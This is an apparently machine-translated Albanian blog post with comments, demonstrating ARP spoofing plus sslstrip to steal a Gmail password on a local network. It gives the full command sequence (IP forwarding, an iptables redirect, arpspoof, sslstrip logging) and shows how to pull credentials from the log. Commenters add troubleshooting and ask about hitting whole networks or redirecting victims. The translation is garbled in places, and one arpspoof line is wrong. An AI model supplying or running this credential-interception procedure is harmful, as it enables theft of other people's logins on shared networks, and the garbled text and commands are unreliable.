ArpSpoofing dhe SSlstrip në veprim.

Përshëndetje Blogger.

Sot kam një shembull të vogël se sa e rrezikshme mund të jetë të jesh i lidhur në çdo rrjet pa siguri të atyre që na pëlqen kaq shumë prej nesh.

Për sot, unë do të përdor ArpSpoofing me Sslstrip për të marrë një fjalëkalim Gmail. Për ta bërë mjedisin më të kontrolluar, unë kam krijuar një llogari të quajtur "testarp@gmail.com".

Dhe meqenëse nuk më pëlqejnë shumë preambulat, le të merremi me punën.

Unë nuk jam përgjegjës në çdo kohë për atë që ata mund të bëjnë me informacionin e mëposhtëm. Unë e bëj atë ekskluzivisht për qëllime edukative

MJEDISI

Për këtë provë ajo që kemi është si vijon:

1. Sulmuesi: Computershtë kompjuteri im desktop ose desktop që ka Debian Wheezy. Nga depot mund të instaloni sslstrip y dsniff për të marrë të ketë mashtrim me arps

2. Viktima: Viktima është një Tablet Android që dëshiron të shohë postën e tij vetëm përmes shfletuesit.

3. Mediumi: Mesi është imi Ruteri Cisco DPC2425

ADRESAT

Adresa e sulmuesit: 172.26.0.2

Adresa e Routerit: 172.26.0.1

Adresa e Viktimës: 172.26.0.8

Sulmi:

Për të kuptuar pak më shumë se si funksionon sulmi, mund të shkoni tek e vjetra ime POST

Gjëja e parë që do të bëjmë për këtë sulm është të aktivizojmë përpara në mënyrë që kompjuteri ynë të mund t'ia përcjellë informacionin viktimës pa e vërejtur ata. (Përndryshe do të ishte një sulm i mohimit të shërbimeve)

Për këtë do të përdorim:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Çdo komandë në një dritare të drejtpërdrejtë të konsolës.

Tani nëse bëjmë bisht -f desdelinux ne e shohim informacionin drejtpërdrejt dhe drejtpërdrejt

foto 1

Atëherë, si ta marrim atë që duam?

Le të shkruajmë së pari postën tonë në Tablet. Ndërsa hyni, ne shohim se mijëra dhe mijëra gjëra shfaqen në tastierën tonë.

Tani që ka mbaruar, le të hapim skedarin tonë "desdelinux” me nano

nano desdelinux

me Control + W kërkojmë diçka që quhet SIGURIM POST.

Dhe do të shohim diçka të tillë.

foto 2

Midis asaj linje të madhe që nuk mund të shihet është email-i dhe fjalëkalimi i viktimës.

Kështu që vrapojmë në të djathtë derisa më në fund të shohim dritën në fund të tunelit.

foto 3

Në një rast tjetër do të shohim se si mund të mbrohemi pak nga këto sulme.

të fala


Lini komentin tuaj

Adresa juaj e emailit nuk do të publikohet. Fusha e kërkuar janë shënuar me *

*

*

  1. Përgjegjës për të dhënat: Miguel Ángel Gatón
  2. Qëllimi i të dhënave: Kontrolloni SPAM, menaxhimin e komenteve.
  3. Legjitimimi: Pëlqimi juaj
  4. Komunikimi i të dhënave: Të dhënat nuk do t'u komunikohen palëve të treta përveç me detyrim ligjor.
  5. Ruajtja e të dhënave: Baza e të dhënave e organizuar nga Occentus Networks (BE)
  6. Të drejtat: Në çdo kohë mund të kufizoni, rikuperoni dhe fshini informacionin tuaj.

  1.   @Jlcmux dijo

    Shfrytëzoj rastin të them se kur u botua postimi, komandat nuk ishin të drejta.

    Komandës iptables në fund i mungon 8080 i cili është në një rresht tjetër. Dhe pastaj komandat arpspoof ishin të gjitha në të njëjtën linjë. Secila komandë është në një linjë të ndryshme.

    Shpresojmë që redaktori e sheh atë dhe mund ta rregullojë atë.

    Përshëndetje.

    1.    Manuali i Burimit dijo

      Unë kam bërë korrigjimet që përmendni, a është në rregull?

      Nëse do të futni kod në një hyrje të preferuar, përdorni pamjen HTML dhe verifikoni që artikulli është i saktë përpara se ta dërgoni atë në pritje. Faleminderit.

  2.   Luis dijo

    Chshtë trishtuese të dihet se ata prej nesh që nuk kanë njohuri janë kaq të prekshëm. Informacion shumë i mirë edhe kur kuptoj pak nga tema e kuptoj rëndësinë. Faleminderit!
    të fala

  3.   giskard dijo

    Por kjo funksionon vetëm nëse sulmuesi dhe viktima janë në të njëjtin rrjet. Në çdo rast, më duket se nëse (duke qenë në të njëjtin rrjet) lidheni duke përdorur HTTPS kjo nuk ndodh sepse të dhënat janë të koduara PARA se të largoheni nga makineria juaj. Nëse lidheni me HTTP (pa S) mendoj se edhe duke parë kabllon e rrjetit shihni çelësat.

    1.    @Jlcmux dijo

      Nuk eshte e vertete. Po hakoj një fjalëkalim të gmail dhe nëse vëreni se gmail përdor https. Kështu që? Çështja është që edhe pse https është i sigurt, kjo varet nga http. Pra, nuk është aq e sigurt.

      Mos rrëfe aq shumë për një https se S nuk është për Supermen se është për "të sigurt"

    2.    Rten dijo

      punon me ose pa https, e kam provuar me një distro më të specializuar linux dhe funksionon pa probleme

    3.    Manuali i Burimit dijo

      Mund ta përdorni saktësisht për t'u dhënë atyre një mësim atyre që vjedhin Wi-Fi tuaj. 😀

      Moreshtë pak a shumë si ajo që thanë shumë kohë më parë në blogun e Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rajonant dijo

        Ostia, shkëlqyeshëm çfarë bën! / Dhe pastaj ata i tregojnë paranojakut tim sa herë që përdor VPN kur shkojnë për të kontrolluar llogarinë bankare…). Nga rruga duhet të shihni se sa cinikë janë njerëzit në komente ... nëse në fund po vjedh ...

        1.    eliotime3000 dijo

          Tani duhet të marrim një udhëzues se si të krijoni dhe të ofroni shërbimin tuaj VPN.

      2.    Daniel dijo

        Historia që ju e lidhni është shumë interesante, madje duket e denjë për një libër roman, dhe kjo më bën të kujtoj kur kam përdorur internetin e fqinjëve të mi dhe megjithëse them se e di këtë temë, mendoj se kurrë nuk mund të shihja dimensionet e vërteta të rreziku që mund të kisha të fundit, për fat të mirë për mua, ata ndryshuan vetëm fjalëkalimin në WPA2 dhe aty filloi historia ime me ISP haha

    4.    Lojra dijo

      Kjo është arsyeja pse titulli thotë Sslstrip në veprim.

      Funksionon, për sa kohë që sulmuesi është në mes

  4.   pas pak dijo

    Çfarë vale punoni në prizëm? -.-
    nr.
    Çfarë po prisni të dërgoni kërkesën tuaj XD
    regards
    post i mbare

  5.   auroszx dijo

    Interesante, unë do të bëj një test arsimor më vonë ... Ndoshta mund të hiqja edhe fjalëkalimin në WiFi dhe të argëtohesha për pak 😛
    Për ndonjë rast, a mund të bësh diçka të ngjashme për të dërguar faqe të ndryshme në ato që synon kërkesa? Për shembull, ata duan të hapin Facebook dhe unë i ridrejtoj te Google? 😛

    1.    @Jlcmux dijo

      Po. Por e gjitha është një listë shumë e ndryshme.

      Ndoshta do ta postoj më vonë.

  6.   i ri dijo

    post shumë i mirë, këto tema janë shumë edukative, tani ne duhet të jemi në gjendje t'i kundërvihemi këtij sulmi, pasi që disa (si unë) lidhen me rrjete publike (universiteti për shembull) do të ishte e dobishme ta shmangni atë.

    Përshëndetje!

  7.   thjesht-një-përdorues tjetër i DL-së dijo

    Nuk më funksionoi

  8.   Uau dijo

    Diçka më dështon këtu, përveç faktit që lidhjet https janë të koduara përmes një çertifikate serveri (pasi të keni certifikatën në kompjuterin tuaj, shfletuesi juaj është përgjegjës për enkriptimin) me iptables ju ridrejtoni portën 80 (http), jo 443 , e cila është https

    1.    @Jlcmux dijo

      Edhe une mendova. Çështja është se megjithëse https është "i sigurt", për fat të keq varet nga http. Pra, sslstrip përfiton nga kjo, kjo e bën shfletuesin të besojë se po përdor kredencialet https por nuk është kështu.

      1.    Uau dijo

        mut i shenjte! por shfletuesi duhet të shohë një paralajmërim si "kjo certifikatë vjen nga një sit i dyshimtë ose diçka e tillë" ... Unë patjetër do të duhet të bëj testet XD

        1.    @Jlcmux dijo

          Jo, absolutisht asgjë nuk del.

  9.   thjesht-një-përdorues tjetër i DL-së dijo

    Më në fund funksionoi për mua
    Unë jam i lidhur në një rrjet WEP me fjalëkalim dhe gjithsesi më tregoi fjalëkalimin.

    Një pyetje. A mund ta bëni të njëjtën procedurë, por për të gjithë kompjuterët që janë të lidhur në rrjet, në vend që të keni një viktimë të vetme?

    1.    @Jlcmux dijo

      Po ti mundesh. Por nuk kam bërë eksperimente. Provojeni vetë dhe na tregoni si shkon.

  10.   mëkatar19 dijo

    E vetmja gjë që marr me këtë është që makina e viktimës të shkojë jashtë linje, por sslstrip nuk më tregon asgjë: /

    1.    @Jlcmux dijo

      Ju duhet të çaktivizoni firewall për një moment. Ose të paktën mundësoni lidhjet hyrëse.

  11.   Z. Zi dijo

    Probe dhe unë mund të shikonim vetëm emrin e përdoruesit dhe fjalëkalimin e faqes në facebook, në gmail nuk gjeta ndonjë rezultat në regjistër, gjithashtu më duhej vetëm një linjë arpspoof «arpspoof -i -t«. Nga ana tjetër, makina e viktimës nuk mund të hapte disa faqe. Unë do të vazhdoj hetimet, është shumë interesante. Një ndihmë për ata që përdorin Manjaro, paketat për të instaluar janë: dsniff (këtu është arpspoff), të përdredhur dhe python2-pyopenssl. Sslstrip mund të shkarkohet nga këtu: http://www.thoughtcrime.org/software/sslstrip/
    Për ta ekzekutuar atë $ python2 sslstrip.py
    Përshëndetje.

  12.   Z. Zi dijo

    Nuk doli por linja arpspoof është: #arpspoof -i int -t ip-viktimë ip-router

  13.   Gjilbert dijo

    shiko bej pikerisht ate qe thua ti:

    echo "1"> / proc / sys / net / ipv4 / ip_para iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Problemi është se viktima, i cili është një kompjuter tjetër që unë kam këtu në dhomën time, mbetet pa lidhje me atë pikë që duhet të rindez routerin, çfarë të bëj, më ndihmo.

    Një gjë tjetër që unë jam duke punuar me një makinë virtuale, dhe kur ekzekutoj komandën iwconfig, wlan0 nuk shfaqet, as kur ekzekutoj ifconfig, megjithatë nëse kam internet në makinën time virtuale çfarë me një ndërfaqe eth0.